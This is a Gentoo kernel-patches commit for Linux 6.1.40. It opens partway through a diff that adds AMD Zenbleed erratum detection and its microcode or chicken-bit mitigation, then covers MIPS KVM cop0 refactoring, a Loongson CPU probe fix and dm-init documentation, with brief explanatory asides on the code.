+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+ void reload_ucode_amd(unsigned int cpu);
++extern void amd_check_microcode(void);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+ static inline void reload_ucode_amd(unsigned int cpu) {}
++static inline void amd_check_microcode(void) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 117e4e977b55d..846067e1ee8bb 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -543,6 +543,7 @@
+ #define MSR_AMD64_DE_CFG		0xc0011029
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT	 1
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE	BIT_ULL(MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT)
++#define MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT 9
+ 
+ #define MSR_AMD64_BU_CFG2		0xc001102a
+ #define MSR_AMD64_IBSFETCHCTL		0xc0011030
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index d2dbbc50b3a7b..7f4eb8b027cc8 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -27,11 +27,6 @@
+ 
+ #include "cpu.h"
+ 
+-static const int amd_erratum_383[];
+-static const int amd_erratum_400[];
+-static const int amd_erratum_1054[];
+-static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum);
+-
+ /*
+  * nodes_per_socket: Stores the number of nodes per socket.
+  * Refer to Fam15h Models 00-0fh BKDG - CPUID Fn8000_001E_ECX
+@@ -39,6 +34,78 @@ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum);
+  */
+ static u32 nodes_per_socket = 1;
+ 
++/*
++ * AMD errata checking
++ *
++ * Errata are defined as arrays of ints using the AMD_LEGACY_ERRATUM() or
++ * AMD_OSVW_ERRATUM() macros. The latter is intended for newer errata that
++ * have an OSVW id assigned, which it takes as first argument. Both take a
++ * variable number of family-specific model-stepping ranges created by
++ * AMD_MODEL_RANGE().
++ *
++ * Example:
++ *
++ * const int amd_erratum_319[] =
++ *	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0x4, 0x2),
++ *			   AMD_MODEL_RANGE(0x10, 0x8, 0x0, 0x8, 0x0),
++ *			   AMD_MODEL_RANGE(0x10, 0x9, 0x0, 0x9, 0x0));
++ */
++
++#define AMD_LEGACY_ERRATUM(...)		{ -1, __VA_ARGS__, 0 }
++#define AMD_OSVW_ERRATUM(osvw_id, ...)	{ osvw_id, __VA_ARGS__, 0 }
++#define AMD_MODEL_RANGE(f, m_start, s_start, m_end, s_end) \
++	((f << 24) | (m_start << 16) | (s_start << 12) | (m_end << 4) | (s_end))
++#define AMD_MODEL_RANGE_FAMILY(range)	(((range) >> 24) & 0xff)
++#define AMD_MODEL_RANGE_START(range)	(((range) >> 12) & 0xfff)
++#define AMD_MODEL_RANGE_END(range)	((range) & 0xfff)
++
++static const int amd_erratum_400[] =
++	AMD_OSVW_ERRATUM(1, AMD_MODEL_RANGE(0xf, 0x41, 0x2, 0xff, 0xf),
++			    AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0xff, 0xf));
++
++static const int amd_erratum_383[] =
++	AMD_OSVW_ERRATUM(3, AMD_MODEL_RANGE(0x10, 0, 0, 0xff, 0xf));
++
++/* #1054: Instructions Retired Performance Counter May Be Inaccurate */
++static const int amd_erratum_1054[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0, 0, 0x2f, 0xf));
++
++static const int amd_zenbleed[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x30, 0x0, 0x4f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
++
++static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
++{
++	int osvw_id = *erratum++;
++	u32 range;
++	u32 ms;
++
++	if (osvw_id >= 0 && osvw_id < 65536 &&
++	    cpu_has(cpu, X86_FEATURE_OSVW)) {
++		u64 osvw_len;
++
++		rdmsrl(MSR_AMD64_OSVW_ID_LENGTH, osvw_len);
++		if (osvw_id < osvw_len) {
++			u64 osvw_bits;
++
++			rdmsrl(MSR_AMD64_OSVW_STATUS + (osvw_id >> 6),
++			    osvw_bits);
++			return osvw_bits & (1ULL << (osvw_id & 0x3f));
++		}
++	}
++
++	/* OSVW unavailable or ID unknown, match family-model-stepping range */
++	ms = (cpu->x86_model << 4) | cpu->x86_stepping;
++	while ((range = *erratum++))
++		if ((cpu->x86 == AMD_MODEL_RANGE_FAMILY(range)) &&
++		    (ms >= AMD_MODEL_RANGE_START(range)) &&
++		    (ms <= AMD_MODEL_RANGE_END(range)))
++			return true;
++
++	return false;
++}
++
+ static inline int rdmsrl_amd_safe(unsigned msr, unsigned long long *p)
+ {
+ 	u32 gprs[8] = { 0 };
+@@ -916,6 +983,47 @@ static void init_amd_zn(struct cpuinfo_x86 *c)
+ 	}
+ }
+ 
++static bool cpu_has_zenbleed_microcode(void)
++{
++	u32 good_rev = 0;
++
++	switch (boot_cpu_data.x86_model) {
++	case 0x30 ... 0x3f: good_rev = 0x0830107a; break;
++	case 0x60 ... 0x67: good_rev = 0x0860010b; break;
++	case 0x68 ... 0x6f: good_rev = 0x08608105; break;
++	case 0x70 ... 0x7f: good_rev = 0x08701032; break;
++	case 0xa0 ... 0xaf: good_rev = 0x08a00008; break;
++
++	default:
++		return false;
++		break;
++	}
++
++	if (boot_cpu_data.microcode < good_rev)
++		return false;
++
++	return true;
++}
++
++static void zenbleed_check(struct cpuinfo_x86 *c)
++{
++	if (!cpu_has_amd_erratum(c, amd_zenbleed))
++		return;
++
++	if (cpu_has(c, X86_FEATURE_HYPERVISOR))
++		return;
++
++	if (!cpu_has(c, X86_FEATURE_AVX))
++		return;
++
++	if (!cpu_has_zenbleed_microcode()) {
++		pr_notice_once("Zenbleed: please update your microcode for the most optimal fix\n");
++		msr_set_bit(MSR_AMD64_DE_CFG, MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT);
++	} else {
++		msr_clear_bit(MSR_AMD64_DE_CFG, MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT);
++	}
++}
++
+ static void init_amd(struct cpuinfo_x86 *c)
+ {
+ 	early_init_amd(c);
+@@ -1005,6 +1113,8 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 		msr_set_bit(MSR_K7_HWCR, MSR_K7_HWCR_IRPERF_EN_BIT);
+ 
+ 	check_null_seg_clears_base(c);
++
++	zenbleed_check(c);
+ }
+ 
+ #ifdef CONFIG_X86_32
+@@ -1100,73 +1210,6 @@ static const struct cpu_dev amd_cpu_dev = {
+ 
+ cpu_dev_register(amd_cpu_dev);
+ 
+-/*
+- * AMD errata checking
+- *
+- * Errata are defined as arrays of ints using the AMD_LEGACY_ERRATUM() or
+- * AMD_OSVW_ERRATUM() macros. The latter is intended for newer errata that
+- * have an OSVW id assigned, which it takes as first argument. Both take a
+- * variable number of family-specific model-stepping ranges created by
+- * AMD_MODEL_RANGE().
+- *
+- * Example:
+- *
+- * const int amd_erratum_319[] =
+- *	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0x4, 0x2),
+- *			   AMD_MODEL_RANGE(0x10, 0x8, 0x0, 0x8, 0x0),
+- *			   AMD_MODEL_RANGE(0x10, 0x9, 0x0, 0x9, 0x0));
+- */
+-
+-#define AMD_LEGACY_ERRATUM(...)		{ -1, __VA_ARGS__, 0 }
+-#define AMD_OSVW_ERRATUM(osvw_id, ...)	{ osvw_id, __VA_ARGS__, 0 }
+-#define AMD_MODEL_RANGE(f, m_start, s_start, m_end, s_end) \
+-	((f << 24) | (m_start << 16) | (s_start << 12) | (m_end << 4) | (s_end))
+-#define AMD_MODEL_RANGE_FAMILY(range)	(((range) >> 24) & 0xff)
+-#define AMD_MODEL_RANGE_START(range)	(((range) >> 12) & 0xfff)
+-#define AMD_MODEL_RANGE_END(range)	((range) & 0xfff)
+-
+-static const int amd_erratum_400[] =
+-	AMD_OSVW_ERRATUM(1, AMD_MODEL_RANGE(0xf, 0x41, 0x2, 0xff, 0xf),
+-			    AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0xff, 0xf));
+-
+-static const int amd_erratum_383[] =
+-	AMD_OSVW_ERRATUM(3, AMD_MODEL_RANGE(0x10, 0, 0, 0xff, 0xf));
+-
+-/* #1054: Instructions Retired Performance Counter May Be Inaccurate */
+-static const int amd_erratum_1054[] =
+-	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0, 0, 0x2f, 0xf));
+-
+-static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+-{
+-	int osvw_id = *erratum++;
+-	u32 range;
+-	u32 ms;
+-
+-	if (osvw_id >= 0 && osvw_id < 65536 &&
+-	    cpu_has(cpu, X86_FEATURE_OSVW)) {
+-		u64 osvw_len;
+-
+-		rdmsrl(MSR_AMD64_OSVW_ID_LENGTH, osvw_len);
+-		if (osvw_id < osvw_len) {
+-			u64 osvw_bits;
+-
+-			rdmsrl(MSR_AMD64_OSVW_STATUS + (osvw_id >> 6),
+-			    osvw_bits);
+-			return osvw_bits & (1ULL << (osvw_id & 0x3f));
+-		}
+-	}
+-
+-	/* OSVW unavailable or ID unknown, match family-model-stepping range */
+-	ms = (cpu->x86_model << 4) | cpu->x86_stepping;
+-	while ((range = *erratum++))
+-		if ((cpu->x86 == AMD_MODEL_RANGE_FAMILY(range)) &&
+-		    (ms >= AMD_MODEL_RANGE_START(range)) &&
+-		    (ms <= AMD_MODEL_RANGE_END(range)))
+-			return true;
+-
+-	return false;
+-}
+-
+ void set_dr_addr_mask(unsigned long mask, int dr)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_BPEXT))
+@@ -1201,3 +1244,15 @@ u32 amd_get_highest_perf(void)
+ 	return 255;
+ }
+ EXPORT_SYMBOL_GPL(amd_get_highest_perf);
++
++static void zenbleed_check_cpu(void *unused)
++{
++	struct cpuinfo_x86 *c = &cpu_data(smp_processor_id());
++
++	zenbleed_check(c);
++}
++
++void amd_check_microcode(void)
++{
++	on_each_cpu(zenbleed_check_cpu, NULL, 1);
++}
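
The AMD_MODEL_RANGE() encoding the relocated block relies on packs one window per u32: family in bits 31-24, start model/stepping in bits 23-12, end model/stepping in bits 11-0. A standalone sketch, separate from the patch, that reuses those macros to match a hypothetical family 0x17, model 0x71, stepping 0 part against the second amd_zenbleed window:

    #include <stdint.h>
    #include <stdio.h>

    #define AMD_MODEL_RANGE(f, m_start, s_start, m_end, s_end) \
            ((f << 24) | (m_start << 16) | (s_start << 12) | (m_end << 4) | (s_end))
    #define AMD_MODEL_RANGE_FAMILY(range)   (((range) >> 24) & 0xff)
    #define AMD_MODEL_RANGE_START(range)    (((range) >> 12) & 0xfff)
    #define AMD_MODEL_RANGE_END(range)      ((range) & 0xfff)

    int main(void)
    {
            /* family 0x17, models 0x60-0x7f, any stepping */
            uint32_t range = AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf);
            uint32_t ms = (0x71 << 4) | 0x0; /* model 0x71, stepping 0 */

            printf("window [%#x, %#x], ms %#x -> %s\n",
                   AMD_MODEL_RANGE_START(range), AMD_MODEL_RANGE_END(range), ms,
                   ms >= AMD_MODEL_RANGE_START(range) &&
                   ms <= AMD_MODEL_RANGE_END(range) ? "match" : "no match");
            return 0;
    }

This prints "window [0x600, 0x7ff], ms 0x710 -> match", which is how zenbleed_check() decides a CPU is affected before choosing between fixed microcode and the DE_CFG chicken bit.
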
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index c34bdba57993a..d298d70f74ce6 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2346,6 +2346,8 @@ void microcode_check(struct cpuinfo_x86 *prev_info)
+ 
+ 	perf_check_microcode();
+ 
++	amd_check_microcode();
++
+ 	store_cpu_caps(&curr_info);
+ 
+ 	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-23 15:14 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-23 15:14 UTC (permalink / raw)
  To: gentoo-commits

commit:     53c2915984a59cdacbcb0e26a996e019d57ff320
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jul 23 15:13:54 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jul 23 15:14:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=53c29159

Linux patch 6.1.40

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    8 +
 1039_linux-6.1.40.patch | 8445 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8453 insertions(+)

diff --git a/0000_README b/0000_README
index 3b5aa81d..e1e77420 100644
--- a/0000_README
+++ b/0000_README
@@ -195,6 +195,14 @@ Patch:  1037_linux-6.1.38.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.38
 
+Patch:  1038_linux-6.1.39.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.39
+
+Patch:  1039_linux-6.1.40.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.40
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1039_linux-6.1.40.patch b/1039_linux-6.1.40.patch
new file mode 100644
index 00000000..c1c19f92
--- /dev/null
+++ b/1039_linux-6.1.40.patch
@@ -0,0 +1,8445 @@
+diff --git a/Documentation/admin-guide/device-mapper/dm-init.rst b/Documentation/admin-guide/device-mapper/dm-init.rst
+index e5242ff17e9b7..981d6a9076994 100644
+--- a/Documentation/admin-guide/device-mapper/dm-init.rst
++++ b/Documentation/admin-guide/device-mapper/dm-init.rst
+@@ -123,3 +123,11 @@ Other examples (per target):
+     0 1638400 verity 1 8:1 8:2 4096 4096 204800 1 sha256
+     fb1a5a0f00deb908d8b53cb270858975e76cf64105d412ce764225d53b8f3cfd
+     51934789604d1b92399c52e7cb149d1b3a1b74bbbcb103b2a0aaacbed5c08584
++
++For setups using device-mapper on top of asynchronously probed block
++devices (MMC, USB, ..), it may be necessary to tell dm-init to
++explicitly wait for them to become available before setting up the
++device-mapper tables. This can be done with the "dm-mod.waitfor="
++module parameter, which takes a list of devices to wait for::
++
++  dm-mod.waitfor=<device1>[,..,<deviceN>]
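
As a concrete illustration (device name and table purely hypothetical), a dm-init setup on an asynchronously probed SD card could combine the two parameters on the kernel command line like this:

    dm-mod.waitfor=/dev/mmcblk0p2 dm-mod.create="lroot,,,rw, 0 8192 linear /dev/mmcblk0p2 0"
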
+diff --git a/Makefile b/Makefile
+index f0619754c29a5..2bb0c01391a98 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 39
++SUBLEVEL = 40
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/mips/include/asm/kvm_host.h b/arch/mips/include/asm/kvm_host.h
+index 5cedb28e8a408..8042a87b8511f 100644
+--- a/arch/mips/include/asm/kvm_host.h
++++ b/arch/mips/include/asm/kvm_host.h
+@@ -317,7 +317,7 @@ struct kvm_vcpu_arch {
+ 	unsigned int aux_inuse;
+ 
+ 	/* COP0 State */
+-	struct mips_coproc *cop0;
++	struct mips_coproc cop0;
+ 
+ 	/* Resume PC after MMIO completion */
+ 	unsigned long io_pc;
+@@ -698,7 +698,7 @@ static inline bool kvm_mips_guest_can_have_fpu(struct kvm_vcpu_arch *vcpu)
+ static inline bool kvm_mips_guest_has_fpu(struct kvm_vcpu_arch *vcpu)
+ {
+ 	return kvm_mips_guest_can_have_fpu(vcpu) &&
+-		kvm_read_c0_guest_config1(vcpu->cop0) & MIPS_CONF1_FP;
++		kvm_read_c0_guest_config1(&vcpu->cop0) & MIPS_CONF1_FP;
+ }
+ 
+ static inline bool kvm_mips_guest_can_have_msa(struct kvm_vcpu_arch *vcpu)
+@@ -710,7 +710,7 @@ static inline bool kvm_mips_guest_can_have_msa(struct kvm_vcpu_arch *vcpu)
+ static inline bool kvm_mips_guest_has_msa(struct kvm_vcpu_arch *vcpu)
+ {
+ 	return kvm_mips_guest_can_have_msa(vcpu) &&
+-		kvm_read_c0_guest_config3(vcpu->cop0) & MIPS_CONF3_MSA;
++		kvm_read_c0_guest_config3(&vcpu->cop0) & MIPS_CONF3_MSA;
+ }
+ 
+ struct kvm_mips_callbacks {
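
The header change above turns cop0 from a pointer into a member embedded directly in kvm_vcpu_arch, which is why every access in the following hunks goes from vcpu->arch.cop0 to &vcpu->arch.cop0: the coprocessor state now lives inside the vcpu allocation instead of behind a separate one. A reduced sketch of the two shapes, with illustrative names rather than the kernel's:

    #include <stdio.h>

    struct coproc {
            unsigned int status;
    };

    /* before: reached through a pointer, separately allocated */
    struct vcpu_arch_old {
            struct coproc *cop0;
    };

    /* after: embedded, so callers take its address when needed */
    struct vcpu_arch_new {
            struct coproc cop0;
    };

    static unsigned int status_old(struct vcpu_arch_old *a)
    {
            return a->cop0->status;         /* vcpu->arch.cop0 */
    }

    static unsigned int status_new(struct vcpu_arch_new *a)
    {
            struct coproc *cop0 = &a->cop0; /* &vcpu->arch.cop0 */

            return cop0->status;
    }

    int main(void)
    {
            struct coproc c = { .status = 1 };
            struct vcpu_arch_old o = { .cop0 = &c };
            struct vcpu_arch_new n = { .cop0 = { .status = 2 } };

            printf("%u %u\n", status_old(&o), status_new(&n));
            return 0;
    }
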
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 6f5d825958778..482af80b81790 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1675,7 +1675,10 @@ static inline void decode_cpucfg(struct cpuinfo_mips *c)
+ 
+ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ {
++	c->cputype = CPU_LOONGSON64;
++
+ 	/* All Loongson processors covered here define ExcCode 16 as GSExc. */
++	decode_configs(c);
+ 	c->options |= MIPS_CPU_GSEXCEX;
+ 
+ 	switch (c->processor_id & PRID_IMP_MASK) {
+@@ -1685,7 +1688,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		case PRID_REV_LOONGSON2K_R1_1:
+ 		case PRID_REV_LOONGSON2K_R1_2:
+ 		case PRID_REV_LOONGSON2K_R1_3:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "Loongson-2K";
+ 			set_elf_platform(cpu, "gs264e");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1698,14 +1700,12 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		switch (c->processor_id & PRID_REV_MASK) {
+ 		case PRID_REV_LOONGSON3A_R2_0:
+ 		case PRID_REV_LOONGSON3A_R2_1:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "ICT Loongson-3";
+ 			set_elf_platform(cpu, "loongson3a");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+ 			break;
+ 		case PRID_REV_LOONGSON3A_R3_0:
+ 		case PRID_REV_LOONGSON3A_R3_1:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "ICT Loongson-3";
+ 			set_elf_platform(cpu, "loongson3a");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1725,7 +1725,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		c->ases &= ~MIPS_ASE_VZ; /* VZ of Loongson-3A2000/3000 is incomplete */
+ 		break;
+ 	case PRID_IMP_LOONGSON_64G:
+-		c->cputype = CPU_LOONGSON64;
+ 		__cpu_name[cpu] = "ICT Loongson-3";
+ 		set_elf_platform(cpu, "loongson3a");
+ 		set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1735,8 +1734,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		panic("Unknown Loongson Processor ID!");
+ 		break;
+ 	}
+-
+-	decode_configs(c);
+ }
+ #else
+ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu) { }
+diff --git a/arch/mips/kvm/emulate.c b/arch/mips/kvm/emulate.c
+index edaec93a1a1fe..e64372b8f66af 100644
+--- a/arch/mips/kvm/emulate.c
++++ b/arch/mips/kvm/emulate.c
+@@ -312,7 +312,7 @@ int kvm_get_badinstrp(u32 *opc, struct kvm_vcpu *vcpu, u32 *out)
+  */
+ int kvm_mips_count_disabled(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	return	(vcpu->arch.count_ctl & KVM_REG_MIPS_COUNT_CTL_DC) ||
+ 		(kvm_read_c0_guest_cause(cop0) & CAUSEF_DC);
+@@ -384,7 +384,7 @@ static inline ktime_t kvm_mips_count_time(struct kvm_vcpu *vcpu)
+  */
+ static u32 kvm_mips_read_count_running(struct kvm_vcpu *vcpu, ktime_t now)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	ktime_t expires, threshold;
+ 	u32 count, compare;
+ 	int running;
+@@ -444,7 +444,7 @@ static u32 kvm_mips_read_count_running(struct kvm_vcpu *vcpu, ktime_t now)
+  */
+ u32 kvm_mips_read_count(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	/* If count disabled just read static copy of count */
+ 	if (kvm_mips_count_disabled(vcpu))
+@@ -502,7 +502,7 @@ ktime_t kvm_mips_freeze_hrtimer(struct kvm_vcpu *vcpu, u32 *count)
+ static void kvm_mips_resume_hrtimer(struct kvm_vcpu *vcpu,
+ 				    ktime_t now, u32 count)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 compare;
+ 	u64 delta;
+ 	ktime_t expire;
+@@ -603,7 +603,7 @@ resume:
+  */
+ void kvm_mips_write_count(struct kvm_vcpu *vcpu, u32 count)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	ktime_t now;
+ 
+ 	/* Calculate bias */
+@@ -649,7 +649,7 @@ void kvm_mips_init_count(struct kvm_vcpu *vcpu, unsigned long count_hz)
+  */
+ int kvm_mips_set_count_hz(struct kvm_vcpu *vcpu, s64 count_hz)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	int dc;
+ 	ktime_t now;
+ 	u32 count;
+@@ -696,7 +696,7 @@ int kvm_mips_set_count_hz(struct kvm_vcpu *vcpu, s64 count_hz)
+  */
+ void kvm_mips_write_compare(struct kvm_vcpu *vcpu, u32 compare, bool ack)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	int dc;
+ 	u32 old_compare = kvm_read_c0_guest_compare(cop0);
+ 	s32 delta = compare - old_compare;
+@@ -779,7 +779,7 @@ void kvm_mips_write_compare(struct kvm_vcpu *vcpu, u32 compare, bool ack)
+  */
+ static ktime_t kvm_mips_count_disable(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 count;
+ 	ktime_t now;
+ 
+@@ -806,7 +806,7 @@ static ktime_t kvm_mips_count_disable(struct kvm_vcpu *vcpu)
+  */
+ void kvm_mips_count_disable_cause(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	kvm_set_c0_guest_cause(cop0, CAUSEF_DC);
+ 	if (!(vcpu->arch.count_ctl & KVM_REG_MIPS_COUNT_CTL_DC))
+@@ -826,7 +826,7 @@ void kvm_mips_count_disable_cause(struct kvm_vcpu *vcpu)
+  */
+ void kvm_mips_count_enable_cause(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 count;
+ 
+ 	kvm_clear_c0_guest_cause(cop0, CAUSEF_DC);
+@@ -852,7 +852,7 @@ void kvm_mips_count_enable_cause(struct kvm_vcpu *vcpu)
+  */
+ int kvm_mips_set_count_ctl(struct kvm_vcpu *vcpu, s64 count_ctl)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	s64 changed = count_ctl ^ vcpu->arch.count_ctl;
+ 	s64 delta;
+ 	ktime_t expire, now;
+diff --git a/arch/mips/kvm/mips.c b/arch/mips/kvm/mips.c
+index a25e0b73ee704..a4f4407b0a332 100644
+--- a/arch/mips/kvm/mips.c
++++ b/arch/mips/kvm/mips.c
+@@ -659,7 +659,7 @@ static int kvm_mips_copy_reg_indices(struct kvm_vcpu *vcpu, u64 __user *indices)
+ static int kvm_mips_get_reg(struct kvm_vcpu *vcpu,
+ 			    const struct kvm_one_reg *reg)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	struct mips_fpu_struct *fpu = &vcpu->arch.fpu;
+ 	int ret;
+ 	s64 v;
+@@ -771,7 +771,7 @@ static int kvm_mips_get_reg(struct kvm_vcpu *vcpu,
+ static int kvm_mips_set_reg(struct kvm_vcpu *vcpu,
+ 			    const struct kvm_one_reg *reg)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	struct mips_fpu_struct *fpu = &vcpu->arch.fpu;
+ 	s64 v;
+ 	s64 vs[2];
+@@ -1111,7 +1111,7 @@ int kvm_vm_ioctl_check_extension(struct kvm *kvm, long ext)
+ int kvm_cpu_has_pending_timer(struct kvm_vcpu *vcpu)
+ {
+ 	return kvm_mips_pending_timer(vcpu) ||
+-		kvm_read_c0_guest_cause(vcpu->arch.cop0) & C_TI;
++		kvm_read_c0_guest_cause(&vcpu->arch.cop0) & C_TI;
+ }
+ 
+ int kvm_arch_vcpu_dump_regs(struct kvm_vcpu *vcpu)
+@@ -1135,7 +1135,7 @@ int kvm_arch_vcpu_dump_regs(struct kvm_vcpu *vcpu)
+ 	kvm_debug("\thi: 0x%08lx\n", vcpu->arch.hi);
+ 	kvm_debug("\tlo: 0x%08lx\n", vcpu->arch.lo);
+ 
+-	cop0 = vcpu->arch.cop0;
++	cop0 = &vcpu->arch.cop0;
+ 	kvm_debug("\tStatus: 0x%08x, Cause: 0x%08x\n",
+ 		  kvm_read_c0_guest_status(cop0),
+ 		  kvm_read_c0_guest_cause(cop0));
+@@ -1257,7 +1257,7 @@ static int __kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ 
+ 	case EXCCODE_TLBS:
+ 		kvm_debug("TLB ST fault:  cause %#x, status %#x, PC: %p, BadVaddr: %#lx\n",
+-			  cause, kvm_read_c0_guest_status(vcpu->arch.cop0), opc,
++			  cause, kvm_read_c0_guest_status(&vcpu->arch.cop0), opc,
+ 			  badvaddr);
+ 
+ 		++vcpu->stat.tlbmiss_st_exits;
+@@ -1329,7 +1329,7 @@ static int __kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ 		kvm_get_badinstr(opc, vcpu, &inst);
+ 		kvm_err("Exception Code: %d, not yet handled, @ PC: %p, inst: 0x%08x  BadVaddr: %#lx Status: %#x\n",
+ 			exccode, opc, inst, badvaddr,
+-			kvm_read_c0_guest_status(vcpu->arch.cop0));
++			kvm_read_c0_guest_status(&vcpu->arch.cop0));
+ 		kvm_arch_vcpu_dump_regs(vcpu);
+ 		run->exit_reason = KVM_EXIT_INTERNAL_ERROR;
+ 		ret = RESUME_HOST;
+@@ -1402,7 +1402,7 @@ int noinstr kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ /* Enable FPU for guest and restore context */
+ void kvm_own_fpu(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int sr, cfg5;
+ 
+ 	preempt_disable();
+@@ -1446,7 +1446,7 @@ void kvm_own_fpu(struct kvm_vcpu *vcpu)
+ /* Enable MSA for guest and restore context */
